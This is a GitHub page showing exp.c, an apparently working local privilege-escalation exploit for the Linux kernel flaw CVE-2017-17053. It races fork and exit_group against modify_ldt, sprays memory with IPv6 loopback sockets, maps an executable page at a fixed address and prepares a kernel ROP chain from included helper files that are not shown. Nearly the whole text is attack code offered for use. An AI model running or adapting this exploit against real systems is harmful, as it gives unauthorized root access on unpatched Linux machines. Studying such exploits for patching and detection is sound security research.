-
Notifications
You must be signed in to change notification settings - Fork 111
/
Copy pathexp.c
129 lines (116 loc) · 2.79 KB
/
exp.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
/* exploit for cve-2017-17053
* author: ww9210
*/
#include <asm/ldt.h>
#include <pthread.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <netinet/in.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/mman.h>
#include "rop_payload.c"
#include "userspace_base_mmap.c"
int fd1,fd2;
struct sockaddr_in6 in1,in2;
int port=0;
int ccid_alloc()
{
struct sockaddr_in6 cin1,cin2;
int ret;
fd1 = socket(0xa,6,0);
if(fd1<0){
perror("socket");
}
memset(&in1,0,sizeof(in1));
in1.sin6_family = AF_INET6;
in1.sin6_addr = in6addr_loopback;
in1.sin6_port = 0x214e;//htons(0x1000);
ret=bind(fd1,(struct sockaddr*)&in1,sizeof(in1));
if(ret<0){
perror("bind");
}
ret=listen(fd1,0x1);
if(ret<0){
perror("listen");
}
fd2 = socket(0xa,6,0);
if(fd2<0){
perror("socket");
}
memset(&cin1,0,sizeof(cin1));
cin1.sin6_family = AF_INET6;
cin1.sin6_addr = in6addr_loopback;
cin1.sin6_port = 0x214e;//htons(0x1000);
cin1.sin6_flowinfo = 0;
ret=connect(fd2,(struct sockaddr*)&cin1,sizeof(cin1));
if(ret<0){
perror("socket");
}
port +=1;
}
static void *fork_thread(void *_arg)
{
fork(); // B
}
char addr[16];
#define THREADS_NUM 1
void * alloc_umem(void *addr,size_t size)
{
addr = mmap((void*)0x100000000,4096,PROT_READ | PROT_WRITE | PROT_EXEC,MAP_SHARED|MAP_ANONYMOUS,-1,0);
if(addr == (char *)-1) {
perror("mmap");
return NULL;
}
return addr;
}
int main(void)
{
char kmsg1[64];
unsigned int i;
pid_t pid;
int ret;
int fd_pad[100];
char * mmapaddr;
struct user_desc desc = { .entry_number = 8191 }; // D
syscall(__NR_modify_ldt, 1, &desc, sizeof(desc)); // A
mmapaddr = (char *)alloc_umem((void*)0x100000000,4096);
save_state();
prepare_krop();
init_userspace_base();
for (i=0;i<200;i++)
{
memset(mmapaddr+1,'\x00',8);
if (fork() == 0) {
pthread_t t;
//srand(getpid());
pthread_create(&t, NULL, fork_thread, NULL);
//usleep(rand() % 10000);
usleep(1);
syscall(__NR_exit_group, 0); // C
}
pid = wait(NULL);
sprintf(kmsg1,"pid:%d",pid);
printf("%s\n",kmsg1);
usleep(900000);
ccid_alloc();
usleep(400000);
printf("xxx\n");
//memset(mmapaddr+1,'\xc3',8);
*(unsigned long*)(mmapaddr+1)=userspace_base_to_map;
*(unsigned long*)(userspace_base_to_map - 0x80)=0;
*(unsigned long*)(userspace_base_to_map + 0x80)=0;
*(unsigned long*)(userspace_base_to_map + 0x3000)=0;
*(unsigned long*)(userspace_base_to_map + 0x2000)=0;
close(fd1);
close(fd2);
}
}